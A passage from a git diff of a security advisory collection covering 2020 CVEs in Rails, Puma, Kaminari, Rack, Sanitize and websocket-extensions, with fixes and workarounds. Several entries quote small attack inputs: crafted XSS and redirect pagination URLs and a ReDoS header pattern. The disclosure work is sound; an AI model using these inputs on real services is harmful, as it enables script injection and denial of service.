-  date: 2020-05-18
-  description: |
-    There is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when
-    untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result
-    from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:
-
-    ```
-    data = cache.fetch("demo", raw: true) { untrusted_string }
-    ```
-
-    Versions Affected:  rails < 5.2.5, rails < 6.0.4
-    Not affected:       Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.
-    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
-
-    Impact
-    ------
-
-    Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,
-    this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.
-
-    In addition to upgrading to the latest versions of Rails, developers should ensure that whenever
-    they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both
-    reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,
-    detect if data was serialized using the raw option upon deserialization.
-
-    Workarounds
-    -----------
-
-    It is recommended that application developers apply the suggested patch or upgrade to the latest release as
-    soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using
-    the `raw` argument should be double-checked to ensure that they conform to the expected format.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.3"
-  - ">= 6.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8165 (activesupport): Potentially unintended unmarshalling of user-provided
+  objects in MemCacheStore and RedisCacheStore'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2020-8165
+  ghsa: 2p68-f74v-9wc6
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c
+  title: Potentially unintended unmarshalling of user-provided objects in MemCacheStore
+    and RedisCacheStore
+  date: 2020-05-18
+  description: |
+    There is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when
+    untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result
+    from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:
+
+    ```
+    data = cache.fetch("demo", raw: true) { untrusted_string }
+    ```
+
+    Versions Affected:  rails < 5.2.5, rails < 6.0.4
+    Not affected:       Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.
+    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
+
+    Impact
+    ------
+
+    Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,
+    this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.
+
+    In addition to upgrading to the latest versions of Rails, developers should ensure that whenever
+    they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both
+    reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,
+    detect if data was serialized using the raw option upon deserialization.
+
+    Workarounds
+    -----------
+
+    It is recommended that application developers apply the suggested patch or upgrade to the latest release as
+    soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using
+    the `raw` argument should be double-checked to ensure that they conform to the expected format.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.3"
+  - ">= 6.0.3.1"
+---
diff --git a/advisories/_posts/2020-05-18-CVE-2020-8166.md b/advisories/_posts/2020-05-18-CVE-2020-8166.md
index 8dc85612..3b266061 100644
--- a/advisories/_posts/2020-05-18-CVE-2020-8166.md
+++ b/advisories/_posts/2020-05-18-CVE-2020-8166.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2020-8166 (actionpack): Ability to forge per-form CSRF tokens given a
-  global CSRF token'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2020-8166
-  ghsa: jp5v-5gx4-jmj9
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw
-  title: Ability to forge per-form CSRF tokens given a global CSRF token
-  date: 2020-05-18
-  description: |
-    It is possible to possible to, given a global CSRF token such as the one
-    present in the authenticity_token meta tag, forge a per-form CSRF token for
-    any action for that session.
-
-    Versions Affected:  rails < 5.2.5, rails < 6.0.4
-    Not affected:       Applications without existing HTML injection vulnerabilities.
-    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
-
-    Impact
-    ------
-
-    Given the ability to extract the global CSRF token, an attacker would be able to
-    construct a per-form CSRF token for that session.
-
-    Workarounds
-    -----------
-
-    This is a low-severity security issue. As such, no workaround is necessarily
-    until such time as the application can be upgraded.
-  cvss_v3: 4.3
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.3"
-  - ">= 6.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8166 (actionpack): Ability to forge per-form CSRF tokens given a
+  global CSRF token'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2020-8166
+  ghsa: jp5v-5gx4-jmj9
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw
+  title: Ability to forge per-form CSRF tokens given a global CSRF token
+  date: 2020-05-18
+  description: |
+    It is possible to possible to, given a global CSRF token such as the one
+    present in the authenticity_token meta tag, forge a per-form CSRF token for
+    any action for that session.
+
+    Versions Affected:  rails < 5.2.5, rails < 6.0.4
+    Not affected:       Applications without existing HTML injection vulnerabilities.
+    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
+
+    Impact
+    ------
+
+    Given the ability to extract the global CSRF token, an attacker would be able to
+    construct a per-form CSRF token for that session.
+
+    Workarounds
+    -----------
+
+    This is a low-severity security issue. As such, no workaround is necessarily
+    until such time as the application can be upgraded.
+  cvss_v3: 4.3
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.3"
+  - ">= 6.0.3.1"
+---
diff --git a/advisories/_posts/2020-05-18-CVE-2020-8167.md b/advisories/_posts/2020-05-18-CVE-2020-8167.md
index 41c7e6b0..377aa0d6 100644
--- a/advisories/_posts/2020-05-18-CVE-2020-8167.md
+++ b/advisories/_posts/2020-05-18-CVE-2020-8167.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2020-8167 (actionview): CSRF Vulnerability in rails-ujs'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2020-8167
-  ghsa: xq5j-gw7f-jgj8
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0
-  title: CSRF Vulnerability in rails-ujs
-  date: 2020-05-18
-  description: |
-    There is an vulnerability in rails-ujs that allows attackers to send
-    CSRF tokens to wrong domains.
-
-    Versions Affected:  rails <= 6.0.3
-    Not affected:       Applications which don't use rails-ujs.
-    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
-
-    Impact
-    ------
-
-    This is a regression of CVE-2015-1840.
-
-    In the scenario where an attacker might be able to control the href attribute of an anchor tag or
-    the action attribute of a form tag that will trigger a POST action, the attacker can set the
-    href or action to a cross-origin URL, and the CSRF token will be sent.
-
-    Workarounds
-    -----------
-
-    To work around this problem, change code that allows users to control the href attribute of an anchor
-    tag or the action attribute of a form tag to filter the user parameters.
-
-    For example, code like this:
-
-        link_to params
-
-    to code like this:
-
-        link_to filtered_params
-
-        def filtered_params
-          # Filter just the parameters that you trust
-        end
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.3"
-  - ">= 6.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8167 (actionview): CSRF Vulnerability in rails-ujs'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2020-8167
+  ghsa: xq5j-gw7f-jgj8
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/x9DixQDG9a0
+  title: CSRF Vulnerability in rails-ujs
+  date: 2020-05-18
+  description: |
+    There is an vulnerability in rails-ujs that allows attackers to send
+    CSRF tokens to wrong domains.
+
+    Versions Affected:  rails <= 6.0.3
+    Not affected:       Applications which don't use rails-ujs.
+    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
+
+    Impact
+    ------
+
+    This is a regression of CVE-2015-1840.
+
+    In the scenario where an attacker might be able to control the href attribute of an anchor tag or
+    the action attribute of a form tag that will trigger a POST action, the attacker can set the
+    href or action to a cross-origin URL, and the CSRF token will be sent.
+
+    Workarounds
+    -----------
+
+    To work around this problem, change code that allows users to control the href attribute of an anchor
+    tag or the action attribute of a form tag to filter the user parameters.
+
+    For example, code like this:
+
+        link_to params
+
+    to code like this:
+
+        link_to filtered_params
+
+        def filtered_params
+          # Filter just the parameters that you trust
+        end
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.3"
+  - ">= 6.0.3.1"
+---
diff --git a/advisories/_posts/2020-05-20-CVE-2020-7656.md b/advisories/_posts/2020-05-20-CVE-2020-7656.md
index e3351768..4227a585 100644
--- a/advisories/_posts/2020-05-20-CVE-2020-7656.md
+++ b/advisories/_posts/2020-05-20-CVE-2020-7656.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2020-7656 (jquery-rails): Cross-Site Scripting in jquery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2020-7656
-  ghsa: q4m3-2j7h-f7xw
-  url: https://snyk.io/vuln/SNYK-JS-JQUERY-569619
-  title: Cross-Site Scripting in jquery
-  date: 2020-05-20
-  description: |
-    Versions of `jquery` prior to 1.9.0 are vulnerable to Cross-Site
-    Scripting. The load method fails to recognize and remove "<script>"
-    HTML tags that contain a whitespace character, i.e: "</script >",
-    which results in the enclosed script logic to be executed. This
-    allows attackers to execute arbitrary JavaScript in a victim's browser.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 2.1.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-7656
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#220-19-january-2013
-    - https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L7481
-    - https://github.com/advisories/GHSA-q4m3-2j7h-f7xw
----
+---
+layout: advisory
+title: 'CVE-2020-7656 (jquery-rails): Cross-Site Scripting in jquery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2020-7656
+  ghsa: q4m3-2j7h-f7xw
+  url: https://snyk.io/vuln/SNYK-JS-JQUERY-569619
+  title: Cross-Site Scripting in jquery
+  date: 2020-05-20
+  description: |
+    Versions of `jquery` prior to 1.9.0 are vulnerable to Cross-Site
+    Scripting. The load method fails to recognize and remove "<script>"
+    HTML tags that contain a whitespace character, i.e: "</script >",
+    which results in the enclosed script logic to be executed. This
+    allows attackers to execute arbitrary JavaScript in a victim's browser.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 2.1.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7656
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#220-19-january-2013
+    - https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L7481
+    - https://github.com/advisories/GHSA-q4m3-2j7h-f7xw
+---
diff --git a/advisories/_posts/2020-05-22-CVE-2020-11076.md b/advisories/_posts/2020-05-22-CVE-2020-11076.md
index 301ca4ea..4fa8e6b9 100644
--- a/advisories/_posts/2020-05-22-CVE-2020-11076.md
+++ b/advisories/_posts/2020-05-22-CVE-2020-11076.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2020-11076 (puma): HTTP Smuggling via Transfer-Encoding Header in Puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2020-11076
-  ghsa: x7jg-6pwg-fx5h
-  url: https://github.com/puma/puma/security/advisories/GHSA-x7jg-6pwg-fx5h
-  date: 2020-05-22
-  title: HTTP Smuggling via Transfer-Encoding Header in Puma
-  description: |
-    ### Impact
-
-    By using an invalid transfer-encoding header, an attacker could
-    [smuggle an HTTP response.](https://portswigger.net/web-security/request-smuggling)
-
-    ### Patches
-
-    The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 3.12.5"
-  - ">= 4.3.4"
----
+---
+layout: advisory
+title: 'CVE-2020-11076 (puma): HTTP Smuggling via Transfer-Encoding Header in Puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2020-11076
+  ghsa: x7jg-6pwg-fx5h
+  url: https://github.com/puma/puma/security/advisories/GHSA-x7jg-6pwg-fx5h
+  date: 2020-05-22
+  title: HTTP Smuggling via Transfer-Encoding Header in Puma
+  description: |
+    ### Impact
+
+    By using an invalid transfer-encoding header, an attacker could
+    [smuggle an HTTP response.](https://portswigger.net/web-security/request-smuggling)
+
+    ### Patches
+
+    The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 3.12.5"
+  - ">= 4.3.4"
+---
diff --git a/advisories/_posts/2020-05-22-CVE-2020-11077.md b/advisories/_posts/2020-05-22-CVE-2020-11077.md
index b65f7927..26b9f0cb 100644
--- a/advisories/_posts/2020-05-22-CVE-2020-11077.md
+++ b/advisories/_posts/2020-05-22-CVE-2020-11077.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2020-11077 (puma): HTTP Smuggling via Transfer-Encoding Header in Puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2020-11077
-  ghsa: w64w-qqph-5gxm
-  url: https://github.com/puma/puma/security/advisories/GHSA-w64w-qqph-5gxm
-  date: 2020-05-22
-  title: HTTP Smuggling via Transfer-Encoding Header in Puma
-  description: |
-    ### Impact
-
-    This is a similar but different vulnerability to the one patched in 3.12.5 and 4.3.4.
-
-    A client could smuggle a request through a proxy, causing the proxy to send a response
-    back to another unknown client.
-
-    If the proxy uses persistent connections and the client adds another request in via HTTP
-    pipelining, the proxy may mistake it as the first request's body. Puma, however,
-    would see it as two requests, and when processing the second request, send back
-    a response that the proxy does not expect. If the proxy has reused the persistent
-    connection to Puma to send another request for a different client, the second response
-    from the first client will be sent to the second client.
-
-    ### Patches
-
-    The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.
-  cvss_v3: 6.8
-  patched_versions:
-  - "~> 3.12.6"
-  - ">= 4.3.5"
----
+---
+layout: advisory
+title: 'CVE-2020-11077 (puma): HTTP Smuggling via Transfer-Encoding Header in Puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2020-11077
+  ghsa: w64w-qqph-5gxm
+  url: https://github.com/puma/puma/security/advisories/GHSA-w64w-qqph-5gxm
+  date: 2020-05-22
+  title: HTTP Smuggling via Transfer-Encoding Header in Puma
+  description: |
+    ### Impact
+
+    This is a similar but different vulnerability to the one patched in 3.12.5 and 4.3.4.
+
+    A client could smuggle a request through a proxy, causing the proxy to send a response
+    back to another unknown client.
+
+    If the proxy uses persistent connections and the client adds another request in via HTTP
+    pipelining, the proxy may mistake it as the first request's body. Puma, however,
+    would see it as two requests, and when processing the second request, send back
+    a response that the proxy does not expect. If the proxy has reused the persistent
+    connection to Puma to send another request for a different client, the second response
+    from the first client will be sent to the second client.
+
+    ### Patches
+
+    The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.
+  cvss_v3: 6.8
+  patched_versions:
+  - "~> 3.12.6"
+  - ">= 4.3.5"
+---
diff --git a/advisories/_posts/2020-05-28-CVE-2020-11082.md b/advisories/_posts/2020-05-28-CVE-2020-11082.md
index 7e6adaf1..03206ef5 100644
--- a/advisories/_posts/2020-05-28-CVE-2020-11082.md
+++ b/advisories/_posts/2020-05-28-CVE-2020-11082.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2020-11082 (kaminari): Cross-Site Scripting in Kaminari via `original_script_name`
-  parameter'
-comments: false
-categories:
-- kaminari
-advisory:
-  gem: kaminari
-  cve: 2020-11082
-  ghsa: r5jw-62xg-j433
-  url: https://github.com/kaminari/kaminari/security/advisories/GHSA-r5jw-62xg-j433
-  date: 2020-05-28
-  title: Cross-Site Scripting in Kaminari via `original_script_name` parameter
-  description: |
-    ### Impact
-    There was a vulnerability in versions of Kaminari that would allow an attacker to inject arbitrary code into pages with pagination links.
-
-    For example, an attacker could craft pagination links that link to other domain or host:
-    https://example.com/posts?page=4&original_script_name=https://another-host.example.com
-
-    In addition, an attacker could also craft pagination links that include JavaScript code that runs when a user clicks the link:
-    https://example.com/posts?page=4&original_script_name=javascript:alert(42)%3b//
-
-    ### Releases
-    The 1.2.1 gem including the patch has already been released.
-    All past released versions are affected by this vulnerability.
-
-    ### Workarounds
-    Application developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant.
-
-    ```ruby
-    module Kaminari::Helpers
-      PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze
-    end
-    ```
-  cvss_v3: 6.4
-  patched_versions:
-  - ">= 1.2.1"
----
+---
+layout: advisory
+title: 'CVE-2020-11082 (kaminari): Cross-Site Scripting in Kaminari via `original_script_name`
+  parameter'
+comments: false
+categories:
+- kaminari
+advisory:
+  gem: kaminari
+  cve: 2020-11082
+  ghsa: r5jw-62xg-j433
+  url: https://github.com/kaminari/kaminari/security/advisories/GHSA-r5jw-62xg-j433
+  date: 2020-05-28
+  title: Cross-Site Scripting in Kaminari via `original_script_name` parameter
+  description: |
+    ### Impact
+    There was a vulnerability in versions of Kaminari that would allow an attacker to inject arbitrary code into pages with pagination links.
+
+    For example, an attacker could craft pagination links that link to other domain or host:
+    https://example.com/posts?page=4&original_script_name=https://another-host.example.com
+
+    In addition, an attacker could also craft pagination links that include JavaScript code that runs when a user clicks the link:
+    https://example.com/posts?page=4&original_script_name=javascript:alert(42)%3b//
+
+    ### Releases
+    The 1.2.1 gem including the patch has already been released.
+    All past released versions are affected by this vulnerability.
+
+    ### Workarounds
+    Application developers who can't update the gem can workaround by overriding the `PARAM_KEY_EXCEPT_LIST` constant.
+
+    ```ruby
+    module Kaminari::Helpers
+      PARAM_KEY_EXCEPT_LIST = [:authenticity_token, :commit, :utf8, :_method, :script_name, :original_script_name].freeze
+    end
+    ```
+  cvss_v3: 6.4
+  patched_versions:
+  - ">= 1.2.1"
+---
diff --git a/advisories/_posts/2020-06-05-CVE-2020-7663.md b/advisories/_posts/2020-06-05-CVE-2020-7663.md
index 5771d702..4717953c 100644
--- a/advisories/_posts/2020-06-05-CVE-2020-7663.md
+++ b/advisories/_posts/2020-06-05-CVE-2020-7663.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2020-7663 (websocket-extensions): Regular Expression Denial of Service
-  in websocket-extensions (RubyGem)'
-comments: false
-categories:
-- websocket-extensions
-advisory:
-  gem: websocket-extensions
-  cve: 2020-7663
-  ghsa: g6wq-qcwm-j5g2
-  url: https://github.com/faye/websocket-extensions-ruby/security/advisories/GHSA-g6wq-qcwm-j5g2
-  date: 2020-06-05
-  title: Regular Expression Denial of Service in websocket-extensions (RubyGem)
-  description: |
-    ### Impact
-
-    The ReDoS flaw allows an attacker to exhaust the server's capacity to process
-    incoming requests by sending a WebSocket handshake request containing a header
-    of the following form:
-
-        Sec-WebSocket-Extensions: a; b="\c\c\c\c\c\c\c\c\c\c ...
-
-    That is, a header containing an unclosed string parameter value whose content is
-    a repeating two-byte sequence of a backslash and some other character. The
-    parser takes exponential time to reject this header as invalid, and this will
-    block the processing of any other work on the same thread. Thus if you are
-    running a single-threaded server, such a request can render your service
-    completely unavailable.
-
-    ### Workarounds
-
-    There are no known work-arounds other than disabling any public-facing WebSocket functionality you are operating.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.1.5"
-  related:
-    url:
-    - https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/
----
+---
+layout: advisory
+title: 'CVE-2020-7663 (websocket-extensions): Regular Expression Denial of Service
+  in websocket-extensions (RubyGem)'
+comments: false
+categories:
+- websocket-extensions
+advisory:
+  gem: websocket-extensions
+  cve: 2020-7663
+  ghsa: g6wq-qcwm-j5g2
+  url: https://github.com/faye/websocket-extensions-ruby/security/advisories/GHSA-g6wq-qcwm-j5g2
+  date: 2020-06-05
+  title: Regular Expression Denial of Service in websocket-extensions (RubyGem)
+  description: |
+    ### Impact
+
+    The ReDoS flaw allows an attacker to exhaust the server's capacity to process
+    incoming requests by sending a WebSocket handshake request containing a header
+    of the following form:
+
+        Sec-WebSocket-Extensions: a; b="\c\c\c\c\c\c\c\c\c\c ...
+
+    That is, a header containing an unclosed string parameter value whose content is
+    a repeating two-byte sequence of a backslash and some other character. The
+    parser takes exponential time to reject this header as invalid, and this will
+    block the processing of any other work on the same thread. Thus if you are
+    running a single-threaded server, such a request can render your service
+    completely unavailable.
+
+    ### Workarounds
+
+    There are no known work-arounds other than disabling any public-facing WebSocket functionality you are operating.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.1.5"
+  related:
+    url:
+    - https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/
+---
diff --git a/advisories/_posts/2020-06-15-CVE-2020-8184.md b/advisories/_posts/2020-06-15-CVE-2020-8184.md
index 001e6187..ad6e81aa 100644
--- a/advisories/_posts/2020-06-15-CVE-2020-8184.md
+++ b/advisories/_posts/2020-06-15-CVE-2020-8184.md
@@ -1,59 +1,59 @@
----
-layout: advisory
-title: 'CVE-2020-8184 (rack): Percent-encoded cookies can be used to overwrite existing
-  prefixed cookie names'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2020-8184
-  ghsa: j6w9-fv6q-3q52
-  url: https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak
-  title: Percent-encoded cookies can be used to overwrite existing prefixed cookie
-    names
-  date: 2020-06-15
-  description: |
-    It is possible to forge a secure or host-only cookie prefix in Rack using
-    an arbitrary cookie write by using URL encoding (percent-encoding) on the
-    name of the cookie. This could result in an application that is dependent on
-    this prefix to determine if a cookie is safe to process being manipulated
-    into processing an insecure or cross-origin request.
-    This vulnerability has been assigned the CVE identifier CVE-2020-8184.
-
-    Versions Affected:  rack < 2.2.3, rack < 2.1.4
-    Not affected:       Applications which do not rely on __Host- and __Secure- prefixes to determine if a cookie is safe to process
-    Fixed Versions:     rack >= 2.2.3, rack >= 2.1.4
-
-    Impact
-    ------
-
-    An attacker may be able to trick a vulnerable application into processing an
-    insecure (non-SSL) or cross-origin request if they can gain the ability to write
-    arbitrary cookies that are sent to the application.
-
-    Workarounds
-    -----------
-
-    If your application is impacted but you cannot upgrade to the released versions or apply
-    the provided patch, this issue can be temporarily addressed by adding the following workaround:
-
-    ```
-    module Rack
-      module Utils
-        module_function def parse_cookies_header(header)
-          return {} unless header
-          header.split(/[;] */n).each_with_object({}) do |cookie, cookies|
-            next if cookie.empty?
-            key, value = cookie.split('=', 2)
-            cookies[key] = (unescape(value) rescue value) unless cookies.key?(key)
-          end
-        end
-      end
-    end
-    ```
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.1.4"
-  - ">= 2.2.3"
----
+---
+layout: advisory
+title: 'CVE-2020-8184 (rack): Percent-encoded cookies can be used to overwrite existing
+  prefixed cookie names'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2020-8184
+  ghsa: j6w9-fv6q-3q52
+  url: https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak
+  title: Percent-encoded cookies can be used to overwrite existing prefixed cookie
+    names
+  date: 2020-06-15
+  description: |
+    It is possible to forge a secure or host-only cookie prefix in Rack using
+    an arbitrary cookie write by using URL encoding (percent-encoding) on the
+    name of the cookie. This could result in an application that is dependent on
+    this prefix to determine if a cookie is safe to process being manipulated
+    into processing an insecure or cross-origin request.
+    This vulnerability has been assigned the CVE identifier CVE-2020-8184.
+
+    Versions Affected:  rack < 2.2.3, rack < 2.1.4
+    Not affected:       Applications which do not rely on __Host- and __Secure- prefixes to determine if a cookie is safe to process
+    Fixed Versions:     rack >= 2.2.3, rack >= 2.1.4
+
+    Impact
+    ------
+
+    An attacker may be able to trick a vulnerable application into processing an
+    insecure (non-SSL) or cross-origin request if they can gain the ability to write
+    arbitrary cookies that are sent to the application.
+
+    Workarounds
+    -----------
+
+    If your application is impacted but you cannot upgrade to the released versions or apply
+    the provided patch, this issue can be temporarily addressed by adding the following workaround:
+
+    ```
+    module Rack
+      module Utils
+        module_function def parse_cookies_header(header)
+          return {} unless header
+          header.split(/[;] */n).each_with_object({}) do |cookie, cookies|
+            next if cookie.empty?
+            key, value = cookie.split('=', 2)
+            cookies[key] = (unescape(value) rescue value) unless cookies.key?(key)
+          end
+        end
+      end
+    end
+    ```
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.1.4"
+  - ">= 2.2.3"
+---
diff --git a/advisories/_posts/2020-06-16-CVE-2020-4054.md b/advisories/_posts/2020-06-16-CVE-2020-4054.md
index 2686d51b..a55927ff 100644
--- a/advisories/_posts/2020-06-16-CVE-2020-4054.md
+++ b/advisories/_posts/2020-06-16-CVE-2020-4054.md
@@ -1,71 +1,71 @@
----
-layout: advisory
-title: 'CVE-2020-4054 (sanitize): Cross-site scripting vulnerability via `<math>`
-  or `<svg>` element in Sanitize'
-comments: false
-categories:
-- sanitize
-advisory:
-  gem: sanitize
-  cve: 2020-4054
-  ghsa: p4x4-rw2p-8j8m
-  url: https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m
-  date: 2020-06-16
-  title: Cross-site scripting vulnerability via `<math>` or `<svg>` element in Sanitize
-  description: |
-    When HTML is sanitized using Sanitize's "relaxed" config or a custom config that allows certain
-    elements, some content in a `<math>` or `<svg>` element may not be sanitized correctly even if
-    `math` and `svg` are not in the allowlist.
-
-    You are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom
-    config that allows one or more of the following HTML elements:
-
-    - `iframe`
-    - `math`
-    - `noembed`
-    - `noframes`
-    - `noscript`
-    - `plaintext`
-    - `script`
-    - `style`
-    - `svg`
-    - `xmp`
-
-    ### Impact
-
-    Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize,
-    potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is
-    rendered in a browser.
-
-    ### Releases
-
-    This problem has been fixed in Sanitize 5.2.1.
-
-    ### Workarounds
-
-    If upgrading is not possible, a workaround is to override the default value of Sanitize's
-    `:remove_contents` config option with the following value, which ensures that the contents of
-    `math` and `svg` elements (among others) are removed entirely when those elements are not in the
-    allowlist:
-
-    ```ruby
-    %w[iframe math noembed noframes noscript plaintext script style svg xmp]
-    ```
-
-    For example, if you currently use Sanitize's relaxed config, you can create a custom config
-    object that overrides the default value of `:remove_contents` like this:
-
-    ```ruby
-    custom_config = Sanitize::Config.merge(
-      Sanitize::Config::RELAXED,
-      :remove_contents => %w[iframe math noembed noframes noscript plaintext script style svg xmp]
-    )
-    ```
-
-    You would then pass this custom config to Sanitize when sanitizing HTML.
-  cvss_v3: 7.3
-  patched_versions:
-  - ">= 5.2.1"
-  unaffected_versions:
-  - "< 3.0.0"
----
+---
+layout: advisory
+title: 'CVE-2020-4054 (sanitize): Cross-site scripting vulnerability via `<math>`
+  or `<svg>` element in Sanitize'
+comments: false
+categories:
+- sanitize
+advisory:
+  gem: sanitize
+  cve: 2020-4054
+  ghsa: p4x4-rw2p-8j8m
+  url: https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m
+  date: 2020-06-16
+  title: Cross-site scripting vulnerability via `<math>` or `<svg>` element in Sanitize
+  description: |
+    When HTML is sanitized using Sanitize's "relaxed" config or a custom config that allows certain
+    elements, some content in a `<math>` or `<svg>` element may not be sanitized correctly even if
+    `math` and `svg` are not in the allowlist.
+
+    You are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom
+    config that allows one or more of the following HTML elements:
+
+    - `iframe`
+    - `math`
+    - `noembed`
+    - `noframes`
+    - `noscript`
+    - `plaintext`
+    - `script`
+    - `style`
+    - `svg`
+    - `xmp`
+
+    ### Impact
+
+    Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize,
+    potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is
+    rendered in a browser.
+
+    ### Releases
+
+    This problem has been fixed in Sanitize 5.2.1.
+
+    ### Workarounds
+
+    If upgrading is not possible, a workaround is to override the default value of Sanitize's
+    `:remove_contents` config option with the following value, which ensures that the contents of
+    `math` and `svg` elements (among others) are removed entirely when those elements are not in the
+    allowlist:
+
+    ```ruby
+    %w[iframe math noembed noframes noscript plaintext script style svg xmp]
+    ```
+
+    For example, if you currently use Sanitize's relaxed config, you can create a custom config
+    object that overrides the default value of `:remove_contents` like this:
+
+    ```ruby
+    custom_config = Sanitize::Config.merge(
+      Sanitize::Config::RELAXED,
+      :remove_contents => %w[iframe math noembed noframes noscript plaintext script style svg xmp]
+    )
+    ```
+
+    You would then pass this custom config to Sanitize when sanitizing HTML.
+  cvss_v3: 7.3
+  patched_versions:
+  - ">= 5.2.1"
+  unaffected_versions:
+  - "< 3.0.0"
+---
diff --git a/advisories/_posts/2020-06-17-CVE-2020-8185.md b/advisories/_posts/2020-06-17-CVE-2020-8185.md
index 001c7fc1..d1d6c59c 100644
--- a/advisories/_posts/2020-06-17-CVE-2020-8185.md
+++ b/advisories/_posts/2020-06-17-CVE-2020-8185.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2020-8185 (actionpack): Untrusted users able to run pending migrations
